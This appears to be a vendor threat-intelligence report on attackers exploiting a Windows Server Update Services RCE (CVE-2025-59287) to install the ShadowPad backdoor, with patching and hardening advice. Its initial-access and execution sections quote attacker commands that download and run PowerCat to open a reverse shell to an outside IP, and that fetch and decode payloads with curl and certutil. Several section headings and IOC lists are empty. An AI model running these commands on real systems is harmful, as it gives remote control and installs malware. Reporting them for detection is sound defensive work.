
Following Microsoft's vulnerability disclosure on October 14, 2025, and the public release of a Proof of Concept (PoC) on October 22, attackers rapidly weaponized CVE-2025-59287, a critical Remote Code Execution (RCE) vulnerability in Windows Server Update Services (WSUS). Multiple sources have observed attacks targeting WSUS-enabled servers to deploy the ShadowPad backdoor. Attackers leverage PowerCat to obtain a system-level shell and utilize native system tools (curl and certutil) to deploy and install ShadowPad via DLL side-loading.
The key warning from this incident is the extremely short break between the public PoC release and actual exploitation. Attackers are abusing common tools such as PowerShell, certutil.exe, and curl.exe to minimize reliance on known malware, thereby increasing the difficulty of signature-based detection. ShadowPad executes primarily in memory via DLL side-loading, injects itself into common Windows processes, and maintains persistence through Run keys and scheduled tasks to evade detection and ensure long-term access. All Windows servers running WSUS—particularly those exposed to the Internet on TCP 8530/8531 or with weak access controls—will be the main targets.
Incident Description
ShadowPad is a privately sold backdoor, commonly associated with China-nexus APT groups. It establishes a covert and persistent access channel, utilizing HTTP/HTTPS via port 443 with browser-mimicking headers to obfuscate legitimate traffic. WSUS serves as core enterprise infrastructure; by exploiting the RCE vulnerability to remotely acquire system-level privileges on WSUS, hackers can establish an initial foothold to control the entire environment and move laterally.
Reconnaissance
Attackers scan for WSUS servers accessible via TCP 8530/8531, identifying targets vulnerable to CVE-2025-59287 (WSUS RCE).
Initial Access
By exploiting CVE-2025-59287 to execute commands with SYSTEM privileges, attackers immediately use PowerShell to download and execute PowerCat, obtaining an interactive CMD shell.
powershell.exe-c IEX (New-Object System.Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’)
;powercat -c 154.17.26[.]41 -p 8080 -e cmd
Execution
Upon gaining initial access, attackers execute legitimate Windows utilities (curl.exe and certutil.exe) to install the ShadowPad malware.
curlhxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curlhxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curlhxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt certutil-decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp
DLL Side-Loading Activating ShadowPad:
By mixing the legitimate EXE and the malicious DLL, the trusted executable loads the malicious DLL, which subsequently decrypts or loads the ShadowPad core. This process occurs entirely in memory.
Persistence
DefenseEvasion
Commandand Control
Exfiltration
Data is exfiltrated via the C2 channel at 163.61.102[.]245:443.
Remove the WSUS RCE attack vector
Apply Microsoft's security updates for CVE-2025-59287 to all WSUS servers immediately. A reboot is required to complete mitigation and remove the RCE vector exploited in this campaign. If patching must be delayed, temporarily disable the WSUS server role or block TCP ports 8530/8531 at the host/perimeter firewall.
Manage WSUS exposure
Secure WSUS from direct Internet exposure by placing it behind a firewall. Restrict access to necessary subnets and administrators only. Limit outbound connections solely to Microsoft Update endpoints and block unnecessary inbound traffic on ports 8530/8531. Enforce 8531 HTTPS communication and disable 8530 HTTP connection.
Harden WSUS host configuration
Implement least-privilege ACLs to prevent unauthorized writing to Program Files, ProgramData, AppData, and Temp. Enforce AppLocker/WDAC allowing-list to run only approved and signed binaries, blocking unauthorized DLL side-loading paths. Reduce the side-loading attack surface by maintaining SafeDllSearchMode and removing redundant software.
Detect and block malicious infrastructure
Enterprises should proactively monitor and block malicious infrastructure related to this incident, including IPs, URLs, and sample hashes. For details, please refer to the IOC section.
IP
URL
HTTP://163.61.102[.]245:443
Malicious File Paths
Commands with Q-X64 Parameters
CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.